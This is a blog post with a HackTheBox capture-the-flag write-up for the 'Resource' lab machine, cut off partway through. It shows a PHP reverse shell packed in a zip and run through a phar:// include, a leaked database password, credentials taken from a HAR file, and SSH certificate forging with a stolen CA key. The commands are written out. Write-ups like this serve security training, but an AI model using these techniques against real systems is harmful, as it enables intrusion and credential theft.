<!doctype html><html lang=en><head><meta charset=UTF-8><meta http-equiv=X-UA-Compatible content="ie=edge"><meta name=viewport content="width=device-width,initial-scale=1"><meta name=mobile-web-app-capable content="yes"><meta name=apple-mobile-web-app-capable content="yes"><meta name=application-name content><meta name=apple-mobile-web-app-status-bar-style content="#fff"><meta name=apple-mobile-web-app-title content><title>Resource | HackTheBox -
</title><link rel=alternate href=https://h4r1337.github.io/posts/resource/ hreflang=en><link rel=canonical href=https://h4r1337.github.io/posts/resource/><link rel=prev href=https://h4r1337.github.io/posts/permx/><link rel=next href=https://h4r1337.github.io/posts/boi_android_malware/><meta name=description content="Resource is a hard difficulty Linux machine that intricately covers various ways to use `OpenSSH` private and public keys. It centers around the `SSG IT Resource Center` which offers a ticketing service to address the IT issues (`SSH` access, website and security issues, etc. ) of its customers. Upon creating a ticket through the website we can execute Local File Inclusion, trigger a reverse shell and get access to what appears to be a docker container which hosts the ticketing website. From this point, there are various clues in past tickets and left over `SSH` artifacts as well as a key signing API service that will lead to pivoting through other users and escaping the docker. Finally, the machine includes various scripts detailing the functions of its ticketing service and key signing API, one of which includes a vulnerable line of code allowing for brute forcing the final `SSH` key and achieving full privilege escalation"><meta name=keywords content="HTB,hackthebox,Writeup,Walkthrough,Resource,Linux,Hard,phar,RCE,SSH,SSH-Certifcate,har,bash-glob,bash"><meta property="og:url" content="https://h4r1337.github.io/posts/resource/"><meta property="og:site_name" content="h4r1337 blog | CTF writeups"><meta property="og:title" content="Resource | HackTheBox"><meta property="og:description" content="Resource is a hard difficulty Linux machine that intricately covers various ways to use `OpenSSH` private and public keys. It centers around the `SSG IT Resource Center` which offers a ticketing service to address the IT issues (`SSH` access, website and security issues, etc. ) of its customers. Upon creating a ticket through the website we can execute Local File Inclusion, trigger a reverse shell and get access to what appears to be a docker container which hosts the ticketing website. From this point, there are various clues in past tickets and left over `SSH` artifacts as well as a key signing API service that will lead to pivoting through other users and escaping the docker. Finally, the machine includes various scripts detailing the functions of its ticketing service and key signing API, one of which includes a vulnerable line of code allowing for brute forcing the final `SSH` key and achieving full privilege escalation"><meta property="og:locale" content="en"><meta property="og:type" content="article"><meta property="article:section" content="posts"><meta property="article:published_time" content="2024-11-29T23:35:37+05:30"><meta property="article:modified_time" content="2024-11-29T23:35:37+05:30"><meta property="article:tag" content="HackTheBox"><meta property="article:tag" content="Linux"><meta property="article:tag" content="Hard"><meta property="article:tag" content="Phar"><meta property="article:tag" content="RCE"><meta property="article:tag" content="SSH"><meta property="og:image" content="https://h4r1337.github.io/img/resource/cover.webp"><meta property="og:see_also" content="https://h4r1337.github.io/posts/permx/"><meta property="og:see_also" content="https://h4r1337.github.io/posts/blurry/"><meta property="og:see_also" content="https://h4r1337.github.io/posts/board-light/"><meta property="og:see_also" content="https://h4r1337.github.io/posts/perfection/"><meta property="og:see_also" content="https://h4r1337.github.io/posts/two-million/"><meta property="og:see_also" content="https://h4r1337.github.io/posts/precious/"><meta name=twitter:card content="summary_large_image"><meta name=twitter:image content="https://h4r1337.github.io/img/resource/cover.webp"><meta name=twitter:title content="Resource | HackTheBox"><meta name=twitter:description content="Resource is a hard difficulty Linux machine that intricately covers various ways to use `OpenSSH` private and public keys. It centers around the `SSG IT Resource Center` which offers a ticketing service to address the IT issues (`SSH` access, website and security issues, etc. ) of its customers. Upon creating a ticket through the website we can execute Local File Inclusion, trigger a reverse shell and get access to what appears to be a docker container which hosts the ticketing website. From this point, there are various clues in past tickets and left over `SSH` artifacts as well as a key signing API service that will lead to pivoting through other users and escaping the docker. Finally, the machine includes various scripts detailing the functions of its ticketing service and key signing API, one of which includes a vulnerable line of code allowing for brute forcing the final `SSH` key and achieving full privilege escalation"><meta name=referrer content="no-referrer-when-downgrade"><link rel=apple-touch-icon sizes=180x180 href=/favicons/apple-touch-icon.png><link rel=icon type=image/png sizes=32x32 href=/favicons/favicon-32x32.png><link rel=icon type=image/png sizes=16x16 href=/favicons/favicon-16x16.png><link rel=manifest href=/favicons/site.webmanifest><link rel=mask-icon href=/favicons/safari-pinned-tab.svg color=#5bbad5><meta name=apple-mobile-web-app-title content="Jekyll Klise"><meta name=application-name content="Jekyll Klise"><meta name=msapplication-TileColor content="#da532c"><meta name=theme-color content="#2c2c2c"><link href=https://unpkg.com/boxicons@2.1.4/css/boxicons.min.css rel=stylesheet><link rel=stylesheet href=/sass/main.min.2480d733c3cd78de5d135eb2d8c0b0f964b2bf1e047d180f4f363bdcc3b23b20.css integrity="sha256-JIDXM8PNeN5dE16y2MCw+WSyvx4EfRgPTzY73MOyOyA="><link rel=stylesheet href=/lib/fontawesome-free/all.min.e5e202e3c899507992952533f57b634722b69b34241d271963559d31aa33ef81.css integrity="sha256-5eIC48iZUHmSlSUz9XtjRyK2mzQkHScZY1WdMaoz74E="></head><body data-theme=dark class=notransition><script>const body=document.body,data=body.getAttribute("data-theme"),initTheme=e=>{e==="dark"?body.setAttribute("data-theme","dark"):e==="light"?body.removeAttribute("data-theme"):localStorage.setItem("theme",data)};initTheme(localStorage.getItem("theme")),setTimeout(()=>body.classList.remove("notransition"),75)</script><script id=partial/analytics.html data-goatcounter=https://h4r1337-blog.goatcounter.com/count async src=//gc.zgo.at/count.js></script><div class=navbar role=navigation><nav class=menu><input type=checkbox id=menu-trigger class=menu-trigger>
<label for=menu-trigger><span class=menu-icon><svg width="24" height="24" viewBox="0 0 512 512"><path d="M64 384H448V341.33H64zm0-106.67H448V234.67H64zM64 128v42.67H448V128z"/></svg>
</span></label><a id=mode href=#><svg class="mode-sunny" width="24" height="24" viewBox="0 0 512 512"><title>LIGHT</title><line x1="256" y1="48" x2="256" y2="96" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="256" y1="416" x2="256" y2="464" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="403.08" y1="108.92" x2="369.14" y2="142.86" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="142.86" y1="369.14" x2="108.92" y2="403.08" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="464" y1="256" x2="416" y2="256" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="96" y1="256" x2="48" y2="256" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="403.08" y1="403.08" x2="369.14" y2="369.14" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="142.86" y1="142.86" x2="108.92" y2="108.92" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><circle cx="256" cy="256" r="80" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/></svg><svg class="mode-moon" width="24" height="24" viewBox="0 0 512 512"><title>DARK</title><line x1="256" y1="48" x2="256" y2="96" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="256" y1="416" x2="256" y2="464" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="403.08" y1="108.92" x2="369.14" y2="142.86" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="142.86" y1="369.14" x2="108.92" y2="403.08" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="464" y1="256" x2="416" y2="256" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="96" y1="256" x2="48" y2="256" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="403.08" y1="403.08" x2="369.14" y2="369.14" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="142.86" y1="142.86" x2="108.92" y2="108.92" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><circle cx="256" cy="256" r="80" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/></svg></a><div class=trigger><div class=trigger-container><a class=menu-link href=/ title=home>home
</a><a class=menu-link href=/posts title=posts>posts
</a><a class=menu-link href=/series title=series>series
</a><a class=menu-link href=/resume.pdf title=resume>resume
</a><a class=menu-link href=/whoami title=whoami>whoami
</a><a class="menu-link rss" href=/index.xml><svg width="17" height="17" viewBox="0 0 512 512" fill="#ed812e"><title>RSS</title><path d="M108.56 342.78a60.34 60.34.0 1060.56 60.44 60.63 60.63.0 00-60.56-60.44z"/><path d="M48 186.67v86.55c52 0 101.94 15.39 138.67 52.11s52 86.56 52 138.67h86.66c0-151.56-125.66-277.33-277.33-277.33z"/><path d="M48 48v86.56c185.25.0 329.22 144.08 329.22 329.44H464C464 234.66 277.67 48 48 48z"/></svg></a></div></div></nav></div><div class="wrapper post"><main class=page-content aria-label=Content><article itemscope itemtype=https://schema.org/BlogPosting><header class=header><div class=tags><span itemprop=keywords><a href=https://h4r1337.github.io/tags/hackthebox/ class=tag>HACKTHEBOX</a>
,
<a href=https://h4r1337.github.io/tags/linux/ class=tag>LINUX</a>
,
<a href=https://h4r1337.github.io/tags/hard/ class=tag>HARD</a>
,
<a href=https://h4r1337.github.io/tags/phar/ class=tag>PHAR</a>
,
<a href=https://h4r1337.github.io/tags/rce/ class=tag>RCE</a>
,
<a href=https://h4r1337.github.io/tags/ssh/ class=tag>SSH</a>
,
<a href=https://h4r1337.github.io/tags/ssh-certifcate/ class=tag>SSH-CERTIFCATE</a>
,
<a href=https://h4r1337.github.io/tags/har/ class=tag>HAR</a>
,
<a href=https://h4r1337.github.io/tags/bash-glob/ class=tag>BASH-GLOB</a>
,
<a href=https://h4r1337.github.io/tags/bash/ class=tag>BASH</a></span></div><h1 class=header-title itemprop=headline>Resource | HackTheBox</h1><div class=post-meta><time datetime="2024-11-29 23:35:37 +0530 +0530" itemprop=datePublished>2024-11-29
</time><span itemprop=author itemscope itemtype=https://schema.org/Person><span itemprop=name>h4r1337</span>
</span><time hidden datetime="2024-11-29 23:35:37 +0530 +0530" itemprop=dateModified></time>
<span hidden itemprop=publisher itemtype=Person>h4r1337</span>
<span hidden itemprop=mainEntityOfPage>Resource is a hard difficulty Linux machine that intricately covers various ways to use `OpenSSH` private and public keys. It centers around the `SSG IT Resource Center` which offers a ticketing service to address the IT issues (`SSH` access, website and security issues, etc. ) of its customers. Upon creating a ticket through the website we can execute Local File Inclusion, trigger a reverse shell and get access to what appears to be a docker container which hosts the ticketing website. From this point, there are various clues in past tickets and left over `SSH` artifacts as well as a key signing API service that will lead to pivoting through other users and escaping the docker. Finally, the machine includes various scripts detailing the functions of its ticketing service and key signing API, one of which includes a vulnerable line of code allowing for brute forcing the final `SSH` key and achieving full privilege escalation</span></div></header><div class=page-content itemprop=articleBody><h3 id=overview><a href=#overview class=anchor-head aria-label=Anchor></a>Overview</h3><figure><img src=/img/resource/cover.webp></figure><table><thead><tr><th style=text-align:center>Title</th><th style=text-align:center><a href=https://app.hackthebox.com/machines/Resource>Resource</a></th></tr></thead><tbody><tr><td style=text-align:center>Difficulty</td><td style=text-align:center>Hard</td></tr><tr><td style=text-align:center>Machine</td><td style=text-align:center>Linux</td></tr><tr><td style=text-align:center>Maker</td><td style=text-align:center><a href=https://app.hackthebox.com/users/4935><img src=https://www.hackthebox.com/badge/image/4935 alt style=display:unset></a></td></tr></tbody></table><br><div class="alert alert-tip collapsed"><div class=alert-heading-box onclick=toggleAlert(this)><i class="bx bx-bulb"></i><p class=alert-heading>About Resource</p><i class='bx bx-chevron-down collapsed'></i></div><div class=alert-content style=display:none><p>Resource is a hard difficulty Linux machine that intricately covers various ways to use <code>OpenSSH</code> private and public keys. It centers around the <code>SSG IT Resource Center</code> which offers a ticketing service to address the IT issues (<code>SSH</code> access, website and security issues, etc. ) of its customers. Upon creating a ticket through the website we can execute Local File Inclusion, trigger a reverse shell and get access to what appears to be a docker container which hosts the ticketing website. From this point, there are various clues in past tickets and left over <code>SSH</code> artifacts as well as a key signing API service that will lead to pivoting through other users and escaping the docker. Finally, the machine includes various scripts detailing the functions of its ticketing service and key signing API, one of which includes a vulnerable line of code allowing for brute forcing the final <code>SSH</code> key and achieving full privilege escalation.</p></div></div><script>function toggleAlert(e){var t=e.parentElement,s=t.querySelector(".alert-content"),n=e.querySelectorAll("i")[1];t.classList.toggle("open"),t.classList.toggle("collapsed"),t.classList.contains("open")?(s.style.display="block",n.classList.remove("open"),n.classList.add("collapsed")):(n.classList.remove("collapsed"),n.classList.add("open"),s.style.display="none")}</script><h2 id=information-gathering><a href=#information-gathering class=anchor-head aria-label=Anchor></a>Information Gathering</h2><p>Scanned all TCP ports:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>nmap -p- -vv --min-rate <span style=color:#d3869b>5000</span> 10.10.11.27 -oA nmap/ports
</span></span></code></pre></div><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>Nmap scan report <span style=color:#fe8019>for</span> itrc.ssg.htb <span style=color:#fe8019>(</span>10.10.11.27<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>Host is up, received syn-ack <span style=color:#fe8019>(</span>0.27s latency<span style=color:#fe8019>)</span>.
</span></span><span style=display:flex><span>Scanned at 2024-08-08 18:56:08 IST <span style=color:#fe8019>for</span> 1s
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>PORT     STATE SERVICE      REASON
</span></span><span style=display:flex><span>22/tcp   open  ssh          syn-ack
</span></span><span style=display:flex><span>80/tcp   open  http         syn-ack
</span></span><span style=display:flex><span>2222/tcp open  EtherNetIP-1 syn-ack
</span></span></code></pre></div><p>Enumerated open TCP ports:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>nmap -p22,80,2222 -vv -sC -sV --min-rate <span style=color:#d3869b>5000</span> 10.10.11.27 -oA nmap/servce
</span></span></code></pre></div><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>Nmap scan report <span style=color:#fe8019>for</span> itrc.ssg.htb <span style=color:#fe8019>(</span>10.10.11.27<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>Host is up, received syn-ack <span style=color:#fe8019>(</span>0.26s latency<span style=color:#fe8019>)</span>.
</span></span><span style=display:flex><span>Scanned at 2024-08-08 18:58:41 IST <span style=color:#fe8019>for</span> 15s
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>PORT     STATE SERVICE REASON  VERSION
</span></span><span style=display:flex><span>22/tcp   open  ssh     syn-ack OpenSSH 9.2p1 Debian 2+deb12u3 <span style=color:#fe8019>(</span>protocol 2.0<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>80/tcp   open  http    syn-ack nginx 1.18.0 <span style=color:#fe8019>(</span>Ubuntu<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>| http-cookie-flags:
</span></span><span style=display:flex><span>|   /:
</span></span><span style=display:flex><span>|     PHPSESSID:
</span></span><span style=display:flex><span>|_      httponly flag not <span style=color:#fabd2f>set</span>
</span></span><span style=display:flex><span>| http-methods:
</span></span><span style=display:flex><span>|_  Supported Methods: GET HEAD POST OPTIONS
</span></span><span style=display:flex><span>|_http-server-header: nginx/1.18.0 <span style=color:#fe8019>(</span>Ubuntu<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>|_http-title: IT Support Center
</span></span><span style=display:flex><span>2222/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 <span style=color:#fe8019>(</span>Ubuntu Linux; protocol 2.0<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</span></span></code></pre></div><hr><h2 id=enumeration><a href=#enumeration class=anchor-head aria-label=Anchor></a>Enumeration</h2><h3 id=port-80---http-nginx-1180><a href=#port-80---http-nginx-1180 class=anchor-head aria-label=Anchor></a>Port 80 - HTTP (Nginx <code>1.18.0</code>)</h3><p>Forwarding to <code>itrc.ssg.htb</code></p><figure><img src=/img/resource/Pasted%20image%2020240808185634.webp></figure><p>Adding that to <code>/etc/hosts</code></p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span><span style=color:#fabd2f>echo</span> -e <span style=color:#b8bb26>&#39;10.10.11.27\titrc.ssg.htb&#39;</span> | sudo tee -a /etc/hosts
</span></span></code></pre></div><figure><img src=/img/resource/Pasted%20image%2020240808190008.webp></figure><p>Clicking on login redirects us to <code>/?page=login</code></p><figure><img src=/img/resource/Pasted%20image%2020240808190601.webp></figure><p>I tried LFI on the <code>page</code> parameter:</p><figure><img src=/img/resource/Pasted%20image%2020240808190744.webp></figure><p>But it redirects us back to the home page. The <code>#</code> at the end of the url was to bypass potential file extensions like <code>.php</code> extension that will be added to the page value. I also tried <code>%0a</code>, <code>%00</code>, etc. Those were also not working</p><p>I registered an account and logged in and we can access a dashboard now.</p><figure><img src=/img/resource/Pasted%20image%2020240808191606.webp></figure><p>We can create tickets and upload files. This is often the place for XSS, so we can enter some payloads for testing.</p><figure><img src=/img/resource/Pasted%20image%2020240809183239.webp></figure><p>I tried to use the upload functionality to upload a php reverse shell but that didn&rsquo;t worked. It strictly checks if the upload file is a zip file.
Next thing I noticed is every ticket have an <code>id</code> assigned to it, and we can view the contents of the ticket.</p><figure><img src=/img/resource/Pasted%20image%2020240809183352.webp></figure><p>So I tried IDOR.</p><figure><img src=/img/resource/Pasted%20image%2020240809183509.webp></figure><p>That wasn&rsquo;t working either, It redirected us to the home page.</p><figure><img src=/img/resource/Pasted%20image%2020240809183525.webp></figure><p>Then I checked the source code and saw that the value of the <code>id</code> parameter was reflecting in the js code.</p><figure><img src=/img/resource/Pasted%20image%2020240809183812.webp></figure><p>We can inject js code through the <code>id</code> paramter and when the <code>submitComment</code> function is invoked, that is when we press the comment button our payload will execute.</p><figure><img src=/img/resource/Pasted%20image%2020240809184230.webp></figure><p>But it is just a self xss, no actual impact. Then again I focused on the upload functionality.</p><figure><img src=/img/resource/Pasted%20image%2020241129192411.webp></figure><p>The uploaded zip file is placed in the <code>/uploads/</code>, the server renames the file. I checked if any of the files inside the zip file is extracted in the <code>/uploads</code> folder but found nothing. If we can somehow execute a php file inside the zip archive we can achieve rce in the server. In php we can use the <a href=https://www.php.net/manual/en/phar.using.stream.php><code>phar://</code> wrapper</a> to execute a php file inside the zip archive we upload. We can use the <code>?page</code> parameter and give it a <code>phar://</code> url and see how it responds.</p><hr><h2 id=exploitation><a href=#exploitation class=anchor-head aria-label=Anchor></a>Exploitation</h2><h3 id=phar-deserialization><a href=#phar-deserialization class=anchor-head aria-label=Anchor></a><code>phar://</code> deserialization</h3><p>First lets create a zip file with a php reverse shell.</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>cp /usr/share/webshells/php/php-reverse-shell.ph shell.php
</span></span><span style=display:flex><span><span style=color:#928374;font-style:italic>## change ip and port in shell.php</span>
</span></span><span style=display:flex><span><span style=color:#928374;font-style:italic>## then create the zip file</span>
</span></span><span style=display:flex><span>zip -r poc.zip shell.php
</span></span></code></pre></div><p>Now upload the <code>poc.zip</code> and execute the <code>shell.php</code> by sending a request to:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-http data-lang=http><span style=display:flex><span>http://itrc.ssg.htb/?page=phar://uploads/83ffc3c94d5736acfff31d7092fed6d6dcf414cd.zip/shell
</span></span></code></pre></div><p>And we got the shell</p><figure><img src=/img/resource/Pasted%20image%2020240809185821.webp></figure><hr><h2 id=lateral-movement-to-user><a href=#lateral-movement-to-user class=anchor-head aria-label=Anchor></a>Lateral Movement to user</h2><h3 id=local-enumeration><a href=#local-enumeration class=anchor-head aria-label=Anchor></a>Local Enumeration</h3><p>There is a <code>.dockerenv</code> file in the root directory, indicating that we are inside a docker container.</p><figure><img src=/img/resource/Pasted%20image%2020240809191810.webp></figure><p>I checked the <code>/var/www/itrc</code> directory and saw a <code>db.php</code> file</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-php data-lang=php><span style=display:flex><span><span style=color:#fe8019>&lt;?</span>php
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>$dsn <span style=color:#fe8019>=</span> <span style=color:#b8bb26>&#34;mysql:host=db;dbname=resourcecenter;&#34;</span>;
</span></span><span style=display:flex><span>$dbusername <span style=color:#fe8019>=</span> <span style=color:#b8bb26>&#34;jj&#34;</span>;
</span></span><span style=display:flex><span>$dbpassword <span style=color:#fe8019>=</span> <span style=color:#b8bb26>&#34;ugEG5rR5SG8uPd&#34;</span>;
</span></span><span style=display:flex><span>$pdo <span style=color:#fe8019>=</span> <span style=color:#fe8019>new</span> PDO($dsn, $dbusername, $dbpassword);
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#fe8019>try</span> {
</span></span><span style=display:flex><span>    $pdo<span style=color:#fe8019>-&gt;</span><span style=color:#b8bb26;font-weight:700>setAttribute</span>(PDO<span style=color:#fe8019>::</span><span style=color:#b8bb26;font-weight:700>ATTR_ERRMODE</span>, PDO<span style=color:#fe8019>::</span><span style=color:#b8bb26;font-weight:700>ERRMODE_EXCEPTION</span>);
</span></span><span style=display:flex><span>} <span style=color:#fe8019>catch</span> (PDOException $e) {
</span></span><span style=display:flex><span>    <span style=color:#fe8019>die</span>(<span style=color:#b8bb26>&#34;Connection failed: &#34;</span> <span style=color:#fe8019>.</span> $e<span style=color:#fe8019>-&gt;</span><span style=color:#b8bb26;font-weight:700>getMessage</span>());
</span></span><span style=display:flex><span>}
</span></span></code></pre></div><p>But we can&rsquo;t connect to mysql.</p><figure><img src=/img/resource/Pasted%20image%2020240809190108.webp></figure><p>Maybe we can ssh directly into the host machine using the credential?</p><figure><img src=/img/resource/Pasted%20image%2020241129193523.webp></figure><figure><img src=/img/resource/Pasted%20image%2020241129193539.webp></figure><p>And that wasn&rsquo;t working either.</p><p>Before moving on I checked the <code>index.php</code> file to investigate why the <code>phar://</code> attack worked and why the path traversal didn&rsquo;t:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-php data-lang=php><span style=display:flex><span><span style=color:#fe8019>&lt;?</span>php session_start();
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#fe8019>if</span> (isset($_GET[<span style=color:#b8bb26>&#34;page&#34;</span>]) <span style=color:#fe8019>and</span> file_exists($_GET[<span style=color:#b8bb26>&#34;page&#34;</span>] <span style=color:#fe8019>.</span> <span style=color:#b8bb26>&#34;.php&#34;</span>)){
</span></span><span style=display:flex><span>    $page <span style=color:#fe8019>=</span> $_GET[<span style=color:#b8bb26>&#34;page&#34;</span>] <span style=color:#fe8019>.</span> <span style=color:#b8bb26>&#34;.php&#34;</span>;
</span></span><span style=display:flex><span>} <span style=color:#fe8019>elseif</span> (isset($_SESSION[<span style=color:#b8bb26>&#34;username&#34;</span>])) {
</span></span><span style=display:flex><span>    $page <span style=color:#fe8019>=</span> <span style=color:#b8bb26>&#34;dashboard.php&#34;</span>;
</span></span><span style=display:flex><span>} <span style=color:#fe8019>else</span> {
</span></span><span style=display:flex><span>    $page <span style=color:#fe8019>=</span> <span style=color:#b8bb26>&#34;home.php&#34;</span>;
</span></span><span style=display:flex><span>}
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#fe8019>require_once</span> <span style=color:#b8bb26>&#34;header.inc.php&#34;</span>;
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#fe8019>echo</span> <span style=color:#b8bb26>&#34;&lt;div class=</span><span style=color:#b8bb26>\&#34;</span><span style=color:#b8bb26>main</span><span style=color:#b8bb26>\&#34;</span><span style=color:#b8bb26>&gt;&#34;</span>;
</span></span><span style=display:flex><span><span style=color:#fe8019>include_once</span> $page;
</span></span><span style=display:flex><span><span style=color:#fe8019>echo</span> <span style=color:#b8bb26>&#34;&lt;/div&gt;&#34;</span>;
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#fe8019>require_once</span> <span style=color:#b8bb26>&#34;footer.inc.php&#34;</span>;
</span></span><span style=display:flex><span><span style=color:#8ec07c>?&gt;</span>
</span></span></code></pre></div><p>It appends <code>.php</code> to the value of <code>page</code> parameter and checks if that file exists in the server using <code>file_exists()</code> function. That&rsquo;s why we were not able to read <code>/etc/passwd</code> file before, because even if we add a <code>#</code> at the end the <code>file_exists("../../../../etc/passwd#.php")</code> check will fail. This is not that secure because we can perform path traversal and include <code>php</code> files in other folders like <code>../../test.php</code>. But including <code>php</code> files already in the server doesn&rsquo;t help us get a shell. Also the server strictly checks the uploaded file is a <code>zip</code> file. So 0xdf, creator of the challenge chained this with a <code>phar://</code> deserialization attack. cool&mldr;
After a lot of enumeration I couldn&rsquo;t find anything useful. Then I checked the <code>uploads/</code> directory and filtered all the <code>zip</code> files to check if there&rsquo;s anything interesting.</p><figure><img src=/img/resource/Pasted%20image%2020240809191048.webp></figure><p>It&rsquo;s a <a href=https://en.wikipedia.org/wiki/HAR_(file_format)>HAR</a> file:</p><div class="alert alert-note"><div class=alert-heading-box><i class="bx bx-info-circle"></i><p class=alert-heading>What&rsquo;s a HAR file?</p></div><div class=alert-content><p>The <strong>HTTP Archive</strong> format, or <strong>HAR</strong>, is a JSON-formatted archive file format for logging of a web browser&rsquo;s interaction with a site. The common extension for these files is <strong>.har</strong>.</p></div></div><script>function toggleAlert(e){var t=e.parentElement,s=t.querySelector(".alert-content"),n=e.querySelectorAll("i")[1];t.classList.toggle("open"),t.classList.toggle("collapsed"),t.classList.contains("open")?(s.style.display="block",n.classList.remove("open"),n.classList.add("collapsed")):(n.classList.remove("collapsed"),n.classList.add("open"),s.style.display="none")}</script><p>Since it logs all the interactions, we can check for leaked login credentials in this file, and we found one</p><figure><img src=/img/resource/Pasted%20image%2020240809191638.webp></figure><p>It&rsquo;s definitely a user in the machine</p><figure><img src=/img/resource/Pasted%20image%2020240809191735.webp></figure><h3 id=lateral-movement---user-msainristil><a href=#lateral-movement---user-msainristil class=anchor-head aria-label=Anchor></a>Lateral Movement - user msainristil</h3><p>The container is running <code>sshd</code> so we can try ssh into the user with the password</p><figure><img src=/img/resource/Pasted%20image%2020240809192052.webp></figure><p>And it works</p><figure><img src=/img/resource/Pasted%20image%2020240809192137.webp></figure><p>There is a <code>decommission_old_ca</code> directory in the home</p><figure><img src=/img/resource/Pasted%20image%2020240809192355.webp></figure><p>And it&rsquo;s actually a <a href=https://www.lorier.net/docs/ssh-ca.html>Certification Authority key</a></p><figure><img src=/img/resource/Pasted%20image%2020240809192513.webp></figure><h3 id=lateral-movement---user-zzinter><a href=#lateral-movement---user-zzinter class=anchor-head aria-label=Anchor></a>Lateral Movement - user zzinter</h3><p>You can check the website I linked above or the <code>CERTIFICATES</code> section in the man page of <code>ssh-keygen</code> to learn more about this.</p><figure><img src=/img/resource/Pasted%20image%2020240809195007.webp></figure><p>So basically we can sign ssh keys for the users in the machine using this CA.
Fi./rst we have to copy the private key <code>ca-itrc</code> to our local machine. Then create an ssh key pair, and sign it using the CA key for the user <code>zzinter</code> on the machine.</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>chmod <span style=color:#d3869b>600</span> ca-itrc
</span></span><span style=display:flex><span>ssh-keygen -t rsa -f ctf
</span></span><span style=display:flex><span>ssh-keygen -s ca-itrc -I <span style=color:#b8bb26>&#34;zzinter@itrc user key&#34;</span> -n <span style=color:#b8bb26>&#34;zzinter&#34;</span> ./ctf.pub
</span></span></code></pre></div><br><div class="alert alert-note collapsed"><div class=alert-heading-box onclick=toggleAlert(this)><i class="bx bx-info-circle"></i><p class=alert-heading>Explantion</p><i class='bx bx-chevron-down collapsed'></i></div><div class=alert-content style=display:none><p>First we create a ssh key pair<br><code>-t rsa</code> is to set the type of the key to <code>rsa</code><br><code>-f</code> is to specify the name of the file<br>Then we sign the public key using the CA certificate<br><code>-s</code> specifies the CA certificate<br><code>-I</code> it should be in the format <code>user@hostname user key</code><br><code>-n</code> specifies the username<br></p></div></div><script>function toggleAlert(e){var t=e.parentElement,s=t.querySelector(".alert-content"),n=e.querySelectorAll("i")[1];t.classList.toggle("open"),t.classList.toggle("collapsed"),t.classList.contains("open")?(s.style.display="block",n.classList.remove("open"),n.classList.add("collapsed")):(n.classList.remove("collapsed"),n.classList.add("open"),s.style.display="none")}</script><p>It will generate a <code>ctf-cert.pub</code> file. Now we can copy all the generated files into the <code>decommission_old_ca</code> directory. We can start a python http server in our machine and use wget to download all the files</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span><span style=color:#928374;font-style:italic>## our machine</span>
</span></span><span style=display:flex><span>mkdir www
</span></span><span style=display:flex><span>mv ctf* www <span style=color:#fe8019>&amp;&amp;</span> <span style=color:#fabd2f>cd</span> www
</span></span><span style=display:flex><span>python3 -m http.server <span style=color:#d3869b>8000</span>
